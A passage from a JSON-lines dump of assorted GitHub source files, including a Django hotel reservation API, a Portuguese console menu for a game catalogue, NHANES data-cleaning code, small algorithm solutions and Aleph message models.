ReservationSerializer\n\n\ndef health_check(request):\n return HttpResponse('

Health Ok

')\n\n\ndef hotel_list(request):\n context = {\n 'hotels': HotelList.objects.all()\n }\n return render(request, 'Hotel/HotelList.html', context)\n\n\ndef reservation_list(request):\n context = {\n 'hotels': HotelList.objects.all(),\n 'reservationList': ReservationDetails.objects.all(),\n 'guestList': GuestList.objects.all()\n }\n return render(request, 'Reservation/ReservationList.html', context)\n\n\nclass GetGenericHotelList(generics.ListCreateAPIView):\n queryset = HotelList.objects.all()\n serializer_class = HotelSerializer\n\n filter_backends = [filters.SearchFilter]\n search_fields = ['name', 'address']\n\n\n# class GetGenericReservationList(generics.ListCreateAPIView):\n# queryset = ReservationDetails.objects.all()\n# serializer_class = ReservationSerializer\n#\n# filter_backends = [filters.SearchFilter]\n# search_fields = ['hotel_name']\n\n# def post(self, request, *args, **kwargs):\n# return HttpResponse(f\"Booking Confirmed. Your confirmation number : {request.data}\")\n\n\nclass GetGenericReservationList(APIView):\n\n def get_queryset(self):\n reservations = ReservationDetails.objects.all()\n return reservations\n\n def get(self, request, format=None):\n # print(request.query_params)\n checkindate = self.request.query_params.get('checkin_date')\n checkoutdate = self.request.query_params.get('checkout_date')\n city = self.request.query_params.get('address')\n print(city)\n if (city != None):\n checkindate = datetime.strptime(checkindate, \"%Y-%m-%d\").date()\n checkoutdate = datetime.strptime(checkoutdate, \"%Y-%m-%d\").date()\n # and checkindate != None and checkoutdate != None):\n # reserve = ReservationDetails.objects.filter(hotel_name=city)\n reservations = ReservationDetails.objects.filter(hotel_name__in=HotelList.objects.filter(address=city))\n reservation_count = {}\n for reservation in reservations:\n # if reservation.checkin_date >= checkoutdate or reservation.checkout_date <= checkindate:\n if ((checkindate <= reservation.checkin_date and checkoutdate >= reservation.checkout_date) | (\n reservation.checkin_date <= checkindate <= reservation.checkout_date)\n | (checkindate >= reservation.checkin_date and checkoutdate <= reservation.checkout_date) | (\n checkindate <= reservation.checkin_date and checkoutdate >= reservation.checkout_date)):\n if reservation.hotel_name.name in reservation_count:\n reservation_count[reservation.hotel_name.name] += 1\n else:\n reservation_count[reservation.hotel_name.name] = 1\n # hotel_ob = [r.hotel_name.name for r in reservations]\n # reservation_count = {k:hotel_ob.count(k) for k in set(hotel_ob)}\n hotels = HotelList.objects.filter(address=city)\n for hotel in hotels:\n if hotel.name in reservation_count:\n hotel.rooms_available -= reservation_count[hotel.name]\n hotel_serializer = HotelSerializer(hotels, many=True)\n return Response(hotel_serializer.data)\n print([(reservations.filter(hotel_name=hotel.name)).count() for hotel in hotels])\n count = 0\n serializer = HotelSerializer(hotels, many=True)\n print(count)\n\n else:\n reservations = self.get_queryset()\n serializer = ReservationSerializer(reservations, many=True)\n return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = ReservationSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n var = serializer.data.pop('confirmation_num')\n return Response(f\"Booking Confirmed. Your confirmation number is : {var}\", status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"RantJames/HotelReservation_Django","sub_path":"ReservationApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31174300306","text":"import pygame as pg\n\nfrom src.entities.alert import Alert\n\n\nclass GameOverPrompt(Alert):\n\n\tdef __init__(self, x, y, w, h, sprites, newColors, msgColor, msg):\n\t\tsuper().__init__(x, y, w, h, sprites, newColors, msgColor, msg)\n\n\tdef render(self, surface, font):\n\t\tself.drawOutline()\n\n\t\ty = 8\n\t\tfor m in self.msg:\n\t\t\ttempSurf = pg.Surface((self.w-16, 8)).convert()\n\t\t\ttempSurf.fill(self.msgColor)\n\t\t\ttempSurf.blit(font.render(m, self.msgColor, pg.Color(\"white\")), (tempSurf.get_width()/2 - len(m)*4, 0))\n\t\t\tself.area.blit(tempSurf, (8, y))\n\t\t\ty += 8\n\n\t\tsurface.blit(self.area, (self.x, self.y))\n\n\t\t","repo_name":"ricochet01/GameProject","sub_path":"src/entities/gameoverscreen.py","file_name":"gameoverscreen.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21912810631","text":"# Passed all test sets\n# The solution will only divide each 4 into two 2s (one for each value A, B)\n# The function clean_str will just remove any leading zeros in the string\n\nimport re \n\ndef clean_str(s):\n\treturn re.sub(r'^0+', '', ''.join(s))\n\ndef generate_pair(n):\n\tA = ['0'] * len(n)\n\tB = ['0'] * len(n)\n\tfor i, v in enumerate(n):\n\t\tif v == '4':\n\t\t\tA[i] = '2'\n\t\t\tB[i] = '2'\n\t\telse:\n\t\t\tA[i] = v\n\treturn clean_str(A), clean_str(B)\n\nif __name__ == '__main__':\n\tT = int(input())\n\n\tfor t in range(1, 1+T):\n\t\tn = input()\n\t\tA, B = generate_pair(n)\n\t\tprint('Case #{}: {} {}'.format(t, A, B))\n","repo_name":"AMR-KELEG/competitive-programming","sub_path":"Google-Code-Jam/Code-Jam-2019/Qualification-round/foregone-solution.py","file_name":"foregone-solution.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"19244271355","text":"import struct\n\nfrom collections import Counter\nfrom operator import itemgetter\n\n\ndef compress_terms_dictionary(dict_, f_name, n_bins=2048):\n bins_for_keys = [(key, key % n_bins) for key in dict_.keys()]\n bins_size = Counter([b[1] for b in bins_for_keys])\n bins_size = sorted(bins_size.items(), key=itemgetter(0))\n bins_size = [b[1] for b in bins_size]\n\n with open(f_name, 'wb') as f_dict:\n f_dict.write(struct.pack('I', n_bins))\n\n for bs in bins_size:\n f_dict.write(struct.pack('I', bs))\n\n for bin in range(n_bins):\n keys_in_bins = sorted([b[0] for b in bins_for_keys if b[1] == bin])\n for key in keys_in_bins:\n f_dict.write(struct.pack('q2I', key, dict_[key][0], dict_[key][1]))\n\n\nif __name__ == '__main__':\n f_name = './index/index.dict'\n with open(f_name, 'r') as f_dict:\n terms_len = struct.unpack(\"Q\", f_dict.read(8))[0]\n terms = list(struct.unpack(\"qII\" * terms_len, f_dict.read((8 + 4 + 4) * terms_len)))\n terms = {\n terms[i]: (terms[i + 1], terms[i + 2])\n for i in range(0, 3 * terms_len, 3)\n }\n\n compress_terms_dictionary(terms, f_name, 4096)","repo_name":"vbugaevskii/sphere.info-retrieval-1.hw","sub_path":"indexation/make_dict.py","file_name":"make_dict.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10677700044","text":"import torch\n\nfrom ctypes import c_float, c_int32, cast, byref, POINTER\n\ndef ctypes_isqrt(number):\n threehalfs = 1.5\n x2 = number * 0.5\n for elem in number:\n y = c_float(elem)\n\n i = cast(byref(y), POINTER(c_int32)).contents.value\n i = c_int32(0x5f3759df - (i >> 1))\n y = cast(byref(i), POINTER(c_float)).contents.value\n\n y = y * (1.5 - (0.5*elem * y * y))\n number = torch.where(number==elem, y, number)\n return number\n# Define a custom function\ndef custom_function(x):\n # Example: Square the input\n return x * x\n\n# Create a sample tensor\ntensor = torch.tensor([1.0, 2.0, 3.0, 4.0])\n\n# Apply the custom function to each element in the tensor\nresult = ctypes_isqrt(tensor)\n\n# Print the result\nprint(result)\n","repo_name":"Ten000hours/ApproxMeth","sub_path":"src/main/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38462973667","text":"import trabjogospy.bd as bd\r\nimport trabjogospy.Desk as desk\r\n\r\n\r\ndef traco():\r\n linha = '-'\r\n print(linha*70)\r\n\r\n\r\ndef titulo():\r\n title = '|MENU PRINCIPAL|'\r\n print(title.center(70))\r\n\r\n\r\ndef opcoes():\r\n print('[1] - Cadastrar Jogos\\n[2] - Ver Jogos\\n[3] - Alterar Jogos\\n[4] - Deletar Jogos\\n[5] - Opções de Usuario\\n[6] - Gerar Relatório\\n[7] - Sair do Programa')\r\n\r\ndef menu(user, id_usuario, senha):\r\n traco()\r\n titulo()\r\n traco()\r\n print(f'|Usuario Ativo|.....................................|{user}|')\r\n traco()\r\n opcoes()\r\n traco()\r\n id_jogador = int(id_usuario)\r\n senhacomparar = senha\r\n user = user\r\n id_usuario = id_usuario\r\n senha = senha\r\n escolha(id_jogador,senhacomparar,user,id_usuario,senha)\r\n\r\n\r\ndef escolha(id_jogador, senhacomparar, user, id_usuario, senha):\r\n escolhe = str(input('[R]: ')).lower().strip()\r\n if(escolhe == '1' or escolhe == 'cadastrar' or escolhe == 'cadastrarjogo' or escolhe =='cadastrarjogos'):\r\n desk.addJogo(user)\r\n menu(user,id_usuario,senha)\r\n elif(escolhe == '2' or escolhe == 'ver' or escolhe == 'verjogo' or escolhe == 'verjogos'):\r\n desk.verJogoLogin(user)\r\n menu(user, id_usuario, senha)\r\n elif(escolhe == '3' or escolhe == 'alterar' or escolhe == 'alterarjogo' or escolhe == 'alterarjogos'):\r\n traco()\r\n print('[1] - Nome\\n[2] - Tempo Jogado\\n[3] - Conquistas\\n[4] - Finalizado')\r\n traco()\r\n while True:\r\n alterar = str(input('O que gostaria de alterar em Jogo?: ')).lower().strip()\r\n if(alterar == '1' or alterar == 'nome'):\r\n desk.trocarNomeJogo()\r\n menu(user, id_usuario, senha)\r\n break\r\n elif(alterar == '2' or alterar == 'tempo' or alterar == 'tempojogado'):\r\n desk.trocarTempojogadoJogo()\r\n menu(user, id_usuario, senha)\r\n break\r\n elif(alterar == '3' or alterar == 'conquistas' or alterar == 'conquista'):\r\n desk.trocarConquistasJogo()\r\n menu(user, id_usuario, senha)\r\n break\r\n elif(alterar == '4' or alterar == 'finalizado'):\r\n desk.trocarFinalizadoJogo()\r\n menu(user, id_usuario, senha)\r\n break\r\n else:\r\n print('[#ERRO#] Opção inválida! Por favor, escolha uma opção válida!\\n[1] - Nome\\n[2] - Tempo Jogado\\n[3] - Conquistas\\n[4] - Finalizado')\r\n elif(escolhe == '4' or escolhe == 'excluir' or escolhe == 'excluirjogo'):\r\n desk.excluirJogo()\r\n menu(user, id_usuario, senha)\r\n elif(escolhe == '5' or escolhe == 'opcoes' or escolhe == 'opcoesdeusuario' or escolhe == 'opcoesusuario' or escolhe == 'opções' or escolhe == 'opçõesdeusuario' or escolhe == 'opçõesusuario' or escolhe == 'opcoesusuário' or escolhe == 'opcoesdeusuário' or escolhe == 'opçõesdeusuário' or escolhe == 'opçõesusuário'):\r\n traco()\r\n print('[1] - Alterar nome do usuario\\n[2] - Alterar senha\\n[3] - EXCLUIR USUARIO')\r\n traco()\r\n opcao = str(input('[R]: ')).lower().strip()\r\n if(opcao == '1' or opcao == 'alterarnome'):\r\n validar = True\r\n while validar:\r\n while True:\r\n novousuario = str(input('Digite seu nome de usuario: ')).strip()\r\n if not novousuario:\r\n print('[#ERRO#] O nome de usuario não pode estar vazio!')\r\n else:\r\n break\r\n for dado in bd.exibeJogador(): \r\n usercompar = str(dado[1])\r\n if(usercompar == novousuario):\r\n print('[#ERRO#] Este nome de usuario já está em uso! Por favor, Escolha outro!') \r\n validar = True\r\n break\r\n else: \r\n validar = False\r\n t = 3\r\n for i in range(3):\r\n t = t-1\r\n senha = str(input('Digite sua senha para continuar a operação: '))\r\n if(senha == senhacomparar):\r\n bd.attNomeJogador(novousuario, id_jogador)\r\n break\r\n else: \r\n if(t > 0):\r\n print(f'[#ERRO#] Senha incorreta! Mais {t} Tentativas!')\r\n elif(t == 0):\r\n print('Numero de tentativas excedido! Cancelando operação...')\r\n exit()\r\n elif(opcao == '2' or opcao == 'alterarsenha'):\r\n while True:\r\n novasenha = str(input('Digite sua nova senha de 8 a 12 caracteres: ')).strip()\r\n if(len(novasenha) > 12):\r\n print('[#ERRO#] Sua senha pode ter no máximo 12 caracteres!')\r\n elif(len(novasenha) < 8):\r\n print('[#ERRO#] Sua senha deve ter no mínimo 8 caracteres!')\r\n elif not novasenha:\r\n print('[#ERRO#] Sua senha não pode estar em branco!')\r\n else:\r\n break\r\n t = 3\r\n for i in range(3):\r\n t = t-1\r\n senha = str(input('Digite sua senha para confirmar a operação: '))\r\n if(senha == senhacomparar):\r\n bd.attSenhaJogador(novasenha, id_jogador)\r\n break\r\n else:\r\n if(t > 0):\r\n print(f'[#ERRO#] Senha incorreta! Mais {t} Tentativas!')\r\n elif(t == 0):\r\n print('Numero de tentativas excedido! Cancelando operação...')\r\n exit()\r\n elif(opcao == '3' or opcao == 'excluir' or opcao == 'excluirusuario'):\r\n print('\\n!!!----ATENÇÃO----!!!\\n')\r\n print('ESTA OPÇÃO DELETARÁ SEU USUARIO PARA SEMPRE! ISSO NÃO PODERÁ SER DESFEITO!')\r\n confirma = str(input('Digite \"CONFIRMA\" para prosseguir: ')).strip()\r\n if(confirma == 'CONFIRMA'):\r\n t = 3\r\n for i in range(3):\r\n t = t-1\r\n senha = str(input('Digite sua senha para confirmar a operação: '))\r\n if(senha == senhacomparar):\r\n bd.delJogador(id_jogador)\r\n break\r\n else:\r\n if(t > 0):\r\n print(f'[#ERRO#] Senha incorreta! Mais {t} Tentativas!')\r\n elif(t == 0):\r\n print('Numero de tentativas foi excedido! A Operação está sendo Cancelanda ...')\r\n exit()\r\n else:\r\n print('Cancelando operação...')\r\n exit()\r\n elif(escolhe == '6' or escolhe == 'gerar' or escolhe == 'gerarrelatorio' or escolhe == 'relatorio'): \r\n while True:\r\n relatorio = str(input('Escolha qual relatório deseja gerar:\\n[1] - Data de criação\\n[2] - Nome de Usuario\\n[3] - Jogos finalizados\\n[R]: ')).lower().strip()\r\n if(relatorio == '1' or relatorio == 'data' or relatorio == 'datacriacao'):\r\n validar = True\r\n msg = int(0)\r\n while validar:\r\n if(msg == 1):\r\n print('[#ERRO#] Nenhum jogo adicionado nessa data. Por favor, digite outra!')\r\n dia = str(input('[DIA]: '))\r\n mes = str(input('[MÊS]: '))\r\n ano = str(input('[ANO]: '))\r\n date = str(dia+'/'+mes+'/'+ano)\r\n for dado in bd.exibeJogo():\r\n comparardata = str(dado[6])\r\n if(comparardata == date):\r\n validar = False\r\n msg = 0\r\n break\r\n else:\r\n msg = 1\r\n validar = True\r\n print('Gerando Relatorio...\\n')\r\n desk.verJogoData(date)\r\n break\r\n elif(relatorio == '2' or relatorio == 'nome' or relatorio == 'nomeusuario' or relatorio == 'nomedeusuario'):\r\n validar = True\r\n msg = int(0)\r\n while validar:\r\n if(msg == 1):\r\n print('[#ERRO#] Este Usuario ainda não adicionou nenhum jogo!\\n Por favor, digite outro usuario.')\r\n usuariorelatorio = str(input('Digite o nome de usuario para filtrar!: '))\r\n for dado in bd.exibeJogo():\r\n compararusuario = str(dado[1])\r\n if(compararusuario == usuariorelatorio):\r\n validar = False\r\n msg = 0\r\n break\r\n else:\r\n msg = 1\r\n validar = True\r\n print('Gerando Relatório...\\n') \r\n desk.verJogoUsuarioRelatorio(usuariorelatorio)\r\n break\r\n elif(relatorio == '3' or relatorio == 'jogofinalizado' or relatorio == 'finalizado'): \r\n while True:\r\n final = str(input('Gostaria de filtrar por jogos finalizados?: ')).lower().strip()\r\n if(final == 'finalizado' or final == 'finalizados'):\r\n fim = str('Sim')\r\n break\r\n elif(final == 'naofinalizado' or final == 'naofinalizados' or final == 'nãofinalizado' or final == 'nãofinalizados'):\r\n fim = str('Não')\r\n break\r\n else:\r\n print('[#ERRO#] Opção inválida! Por favor digite uma opção válida! Opções válidas: [S/N]')\r\n print('Gerando Relatório...\\n')\r\n desk.verJogoFinalizado(fim)\r\n break\r\n else:\r\n print('[#ERRO#] Opção inválida! Por favor, digite uma opção válida!\\n[1] - Data de criação\\n[2] - Nome de Usuario\\n[3] - Jogo finalizado ou não\\n') \r\n elif(escolhe == '7' or escolhe == 'sair' or escolhe == 'sairprograma' or escolhe == 'sairdoprograma'):\r\n print('Saindo...')\r\n exit()\r\n else:\r\n print('[#ERRO#] Opção inválida! Por favor, digite uma opção válida!\\n[1] - Cadastrar Jogo\\n[2] - Ver Jogos\\n[3] - Alterar Jogo\\n[4] - Deletar Jogo\\n[5] - Opções de Usuario\\n[6] - Gerar Relatorios\\n[7] - Sair do Programa')","repo_name":"lucasmansur/RelatoriosJogos","sub_path":"trabjogospy/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":10727,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4677846129","text":"# ### Question 3\n\n# a\n# Read data from cohorts of interest and create cohort columns\ndf2011 = pd.read_sas(\"datasets/DEMO_G.XPT\")\ndf2011['cohort'] = 2011\ndf2013 = pd.read_sas(\"datasets/DEMO_H.XPT\")\ndf2013['cohort'] = 2013\ndf2015 = pd.read_sas(\"datasets/DEMO_I.XPT\")\ndf2015['cohort'] = 2015\ndf2017 = pd.read_sas(\"datasets/DEMO_J.XPT\")\ndf2017['cohort'] = 2017\n# Create df with columns of interest\ndf_demo = df2011.append(df2013).append(df2015).append(df2017)\ndf_demo = df_demo[['SEQN', 'RIAGENDR', 'RIDAGEYR', 'RIDRETH3', 'DMDEDUC2', 'DMDMARTL',\n 'RIDSTATR', 'SDMVPSU', 'SDMVSTRA', 'WTMEC2YR', 'WTINT2YR', 'cohort']]\n# Change column names\ndf_demo.rename(columns={'SEQN' : \"id\", 'RIAGENDR' : \"gender\", 'RIDAGEYR' : \"age\", 'RIDRETH3' : \"race\", \n 'DMDEDUC2' : \"education\", 'DMDMARTL' : \"marital status\",\n 'RIDSTATR' : \"interview status\", 'SDMVPSU' : \"pseudo-psu\", \n 'SDMVSTRA' : \"pseudo-stratum\", 'WTMEC2YR' : \"interviewed and mec examined\", \n 'WTINT2YR' : \"interviewed\"}, inplace=True)\n# Change dtypes to appropriate types\ndf_demo = df_demo.fillna(-1)\ndf_demo = df_demo.astype({'id' : 'int64', 'age' : 'int64', 'race' : 'int64', \n 'marital status' : 'int64', 'education': 'int64', 'interview status' : 'int64', \n 'pseudo-psu' : 'int64', 'pseudo-stratum' : 'int64'})\ndf_demo = df_demo.astype({'gender' : 'category', 'race' : 'category', 'education' : 'category', \n 'marital status' : 'category', 'interview status' : 'category'})\ndf_demo.to_pickle(\"./demographic.pkl\")\n\n# b\n# Read data from cohorts of interest and create cohort columns\ndf2011 = pd.read_sas(\"datasets/OHXDEN_G.XPT\")\ndf2011['cohort'] = 2011\ndf2013 = pd.read_sas(\"datasets/OHXDEN_H.XPT\")\ndf2013['cohort'] = 2013\ndf2015 = pd.read_sas(\"datasets/OHXDEN_I.XPT\")\ndf2015['cohort'] = 2015\ndf2017 = pd.read_sas(\"datasets/OHXDEN_J.XPT\")\ndf2017['cohort'] = 2017\ndf_dent = df2011.append(df2013).append(df2015).append(df2017)\n\n# +\n# Create df with columns of interest\ncolnames = list(df_dent.columns)\nnewcols = []\nfor name in colnames:\n if re.search(\"OHX[0-9]+TC\", name) is not None or re.search(\"OHX[0-9]+CTC\", name) is not None:\n newcols.append(name)\nnewcols.insert(0, \"SEQN\")\nnewcols.insert(1, \"OHDDESTS\")\nnewcols.append(\"cohort\")\ndf_dent = df_dent[newcols]\n\n# Define new column names using regex\nnamedict = {\"SEQN\" : \"id\", \"OHDDESTS\" : \"status\"}\nnumcols = len(newcols)\nfor col in newcols[2:numcols-1]:\n if re.search(\"OHX[0-9]+TC\", col) is not None:\n num = re.findall(r'\\d+', col)\n namedict[col] = \"tooth count \" + num[0]\n else:\n num = re.findall(r'\\d+', col)\n namedict[col] = \"coronal cavity \" + num[0]\ndf_dent.rename(columns=namedict, inplace=True)\ndf_dent = df_dent.fillna(-1)\n\n# Change dtypes to appropriate types\ntypedict = {}\nfor col in list(df_dent.columns):\n typedict[col] = \"int64\"\n if re.search(\"coronal cavity\", col) is not None:\n typedict[col] = \"category\"\ndf_dent = df_dent.astype(typedict)\n\nfor col in list(df_dent.columns):\n typedict[col] = \"category\"\ntypedict[\"id\"] = \"int64\"\ntypedict[\"cohort\"] = \"int64\"\ndf_dent = df_dent.astype(typedict)\ndf_dent.to_pickle(\"./dentition.pkl\")\n# -\n\n# c Number of cases in each df\nprint(\"Cases in first df:\", df_demo.shape[0])\nprint(\"Cases in second df:\", df_dent.shape[0])","repo_name":"weberj13/Stats507","sub_path":"Weber_PS2_Q3.py","file_name":"Weber_PS2_Q3.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"629882932","text":"from .metrics import (\n MultiClassF1Score,\n MultiLabelAUC,\n MultiLabelBCELoss,\n MultiLabelF1Score,\n MultiMetric,\n MultiTaskF1,\n MultiTaskLoss,\n)\nfrom .mixup import CutMix, MixUp, MixVideo\nfrom .utils import (\n MEData,\n Printer,\n ReprMeta,\n dataset_aus,\n reset_weights,\n set_random_seeds,\n validate_config,\n)\n\n__all__ = [\n \"MEData\",\n \"reset_weights\",\n \"set_random_seeds\",\n \"Printer\",\n \"validate_config\",\n \"dataset_aus\",\n \"MixUp\",\n \"CutMix\",\n \"MixVideo\",\n \"MultiTaskLoss\",\n \"MultiMetric\",\n \"MultiClassF1Score\",\n \"MultiLabelBCELoss\",\n \"MultiLabelAUC\",\n \"MultiLabelF1Score\",\n \"MultiTaskF1\",\n \"ReprMeta\",\n]\n","repo_name":"tvaranka/meb","sub_path":"meb/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"38177634784","text":"from typing import List\n\n\nclass Solution:\n def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:\n\n current_tank = 0\n current_start = 0\n total_tank = 0\n\n for station, (to_tank, dist) in enumerate(zip(gas, cost)):\n current_tank += (to_tank - dist)\n total_tank += (to_tank - dist)\n if current_tank < 0:\n current_start = station + 1\n current_tank = 0\n\n if total_tank < 0:\n return -1\n\n return current_start % len(cost)\n\n\nprint(Solution().canCompleteCircuit([1, 2, 3, 4, 5], [3, 4, 5, 1, 2]))\n","repo_name":"blockinhead/algo_python","sub_path":"leetcode/134_gas_station.py","file_name":"134_gas_station.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20937586005","text":"#!/usr/bin/python3\n\nprint(\"hello world\")\n# mettez bien des epsaces et pas des tab\na=1\nif a == 0:\n print(\"toto\")\nelse:\n print('a ne vaut pas 0')\n\nprint(\"fin\")\n\n\n# un entier \nentier = 1\n\n# float \nfl = 1.5\n\n#string \n\nstring = \"chaine1\"\nstring = 'chaine1'\nstring = \"\"\"chaine1\"\"\"\n\nstring = \" ila va dire \\\"coucou\\\" assf\"\nstring = \"\"\"il va dire \"coucou\" assf\"\"\"\n\n# les commentaires \n\n\"\"\"\nles commentaires multilgnes \nsont avec des \" \" \" \n\"\"\"\n\n\nstringadd = \"aa\" + \"bb\"\n\nstringadd = \"aa\" \"bb\"\nprint(stringadd)\n\nstring = \"\"\" coucou\nsalut\nhello\"\"\"\n\nif a == 0:\n string = (\"coucou\\n\"\n \"salut\\n\"\n \"hello\")\n\n#nomenclature google\n\nalphabet = \"abcdefghijklmnopqrstuvwxyz\"\n\nif 'a' in alphabet:\n print(\"j'ai trouve a\")\n\nalist = list()\nalist = []\nalist = [\"a\", \"b\"]\n\nalist = [\"0\", \"1\", \"2\", \"3\", \"4\"]\n\n#une lkist de int\nalist = [1, 2, 3, 4]\nfor x in alist:\n print(x)\nprint(alist)\n\n# fonction qsui genere 15 chiffres de 0 14 \nalist = range(15)\nprint(alist)\nfor x in alist:\n print(x)\n\nfor char in alphabet:\n print(char, end=\"\\n\")\n #print char\n\nalist = []\nprint(alist)\nalist.append(\"hello\")\nprint(alist)\nalist.append(\"hello\")\nprint(alist)\nalist.append(\"hello\")\nprint(alist)\nalist.append(\"hello\")\nprint(alist)\nalist.pop()\nprint(alist)\nblist = [\"salut\", \"salut\"]\nprint (alist + blist)\n\nadict = dict()\nadict = {}\nadict = { \"fr\": \"salut\", \"en\": \"hello\"}\nprint (adict)\n\nprint (adict[\"fr\"])\n\nlang = \"en\"\nprint(adict[lang])\ntrad = { \"fr\": \"salut\",\n \"en\": \"hello\"}\n\nfor key in trad:\n print(key)\n print(trad[key])\n\ntrad_fr = {\"bjou\": \"salut\",\n \"aie\": \"j'ai mal\"}\ntrad_en = {\"bjou\": \"hello\",\n \"aie\": \"it hurts\"}\n\n# un idoc dans un dico \n\ntrad = {\"fr\": trad_fr,\n \"en\": trad_en}\nlang= \"fr\"\nprint(trad[lang]['aie'])\nlang = \"en\"\nprint(trad[lang]['aie'])\n\nalist = [trad_fr, trad_en]\nprint(alist)\n\n# list comprehension \nalist = [\"0\", \"1\", \"2\", \"3\", \"4\"]\n\nlist_comp = [x for x in alist]\nprint(list_comp)\nlist_comp = alist\nprint(list_comp)\n\nlist_comp = [x + \"aa\" for x in alist]\nprint(list_comp)\n\nlist_comp = []\nfor x in alist:\n list_comp.append(x + \"aa\")\nprint(list_comp)\n\ntrad = {\"fr\": \"salut\",\n \"en\": \"hello\"}\nalist = [key for key in trad]\nprint(alist)\n\n\n# recuperer ma liste de langue \n\n\n","repo_name":"newsim/ipssi_python","sub_path":"jour1/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29490683110","text":"import json\nfrom copy import copy\nfrom enum import Enum\nfrom hashlib import sha256\nfrom json import JSONDecodeError\nfrom pathlib import Path\nfrom typing import (\n Any,\n Dict,\n List,\n Literal,\n Optional,\n Type,\n Union,\n)\n\nfrom pydantic import BaseModel, Extra, Field, validator\nfrom typing_extensions import TypeAlias\n\nfrom .abstract import BaseContent\nfrom .execution.instance import InstanceContent\nfrom .execution.program import ProgramContent\nfrom .item_hash import ItemHash, ItemType\n\n\nclass Chain(str, Enum):\n \"\"\"Supported chains\"\"\"\n\n AVAX = \"AVAX\"\n BSC = \"BSC\"\n CSDK = \"CSDK\"\n DOT = \"DOT\"\n ETH = \"ETH\"\n NEO = \"NEO\"\n NULS = \"NULS\"\n NULS2 = \"NULS2\"\n SOL = \"SOL\"\n TEZOS = \"TEZOS\"\n\n\nclass HashType(str, Enum):\n \"\"\"Supported hash functions\"\"\"\n\n sha256 = \"sha256\"\n\n\nclass MessageType(str, Enum):\n \"\"\"Message types supported by Aleph\"\"\"\n\n post = \"POST\"\n aggregate = \"AGGREGATE\"\n store = \"STORE\"\n program = \"PROGRAM\"\n instance = \"INSTANCE\"\n forget = \"FORGET\"\n\n\nclass MongodbId(BaseModel):\n \"\"\"PyAleph returns an internal MongoDB id\"\"\"\n\n oid: str = Field(alias=\"$oid\")\n\n class Config:\n extra = Extra.forbid\n\n\nclass ChainRef(BaseModel):\n \"\"\"Some POST messages have a 'ref' field referencing other content\"\"\"\n\n chain: Chain\n channel: Optional[str] = None\n item_content: str\n item_hash: ItemHash\n item_type: ItemType\n sender: str\n signature: str\n time: float\n type: Literal[\"POST\"] = \"POST\"\n\n\nclass MessageConfirmationHash(BaseModel):\n binary: str = Field(alias=\"$binary\")\n type: str = Field(alias=\"$type\")\n\n class Config:\n extra = Extra.forbid\n\n\nclass MessageConfirmation(BaseModel):\n \"\"\"Format of the result when a message has been confirmed on a blockchain\"\"\"\n\n chain: Chain\n height: int\n hash: Union[str, MessageConfirmationHash]\n # These two optional fields are introduced in recent versions of CCNs. They should\n # remain optional until the corresponding CCN upload (0.4.0) is widely uploaded.\n time: Optional[float] = None\n publisher: Optional[str] = Field(\n default=None, description=\"The address that published the transaction.\"\n )\n\n class Config:\n extra = Extra.forbid\n\n\nclass AggregateContentKey(BaseModel):\n name: str\n\n class Config:\n extra = Extra.forbid\n\n\nclass PostContent(BaseContent):\n \"\"\"Content of a POST message\"\"\"\n\n content: Optional[Any] = Field(\n default=None, description=\"User-generated content of a POST message\"\n )\n ref: Optional[Union[str, ChainRef]] = Field(\n default=None,\n description=\"Other message referenced by this one\",\n )\n type: str = Field(description=\"User-generated 'content-type' of a POST message\")\n\n @validator(\"type\")\n def check_type(cls, v, values):\n if v == \"amend\":\n ref = values.get(\"ref\")\n if not ref:\n raise ValueError(\"A 'ref' is required for POST type 'amend'\")\n return v\n\n class Config:\n extra = Extra.forbid\n\n\nclass AggregateContent(BaseContent):\n \"\"\"Content of an AGGREGATE message\"\"\"\n\n key: Union[str, AggregateContentKey] = Field(\n description=\"The aggregate key can be either a string of a dict containing the key in field 'name'\"\n )\n content: Dict = Field(description=\"The content of an aggregate must be a dict\")\n\n class Config:\n extra = Extra.forbid\n\n\nclass StoreContent(BaseContent):\n \"\"\"Content of a STORE message\"\"\"\n\n item_type: ItemType\n item_hash: ItemHash\n size: Optional[int] = None # Generated by the node on storage\n content_type: Optional[str] = None # Generated by the node on storage\n ref: Optional[str] = None\n\n class Config:\n extra = Extra.allow\n\n\nclass ForgetContent(BaseContent):\n \"\"\"Content of a FORGET message\"\"\"\n\n hashes: List[ItemHash]\n aggregates: List[ItemHash] = Field(default_factory=list)\n reason: Optional[str] = None\n\n def __hash__(self):\n # Convert List to Tuple for hashing\n values = copy(self.__dict__)\n values[\"hashes\"] = tuple(values[\"hashes\"])\n return hash(self.__class__) + hash(values.values())\n\n\nclass BaseMessage(BaseModel):\n \"\"\"Base template for all messages\"\"\"\n\n id_: Optional[MongodbId] = Field(\n alias=\"_id\",\n default=None,\n 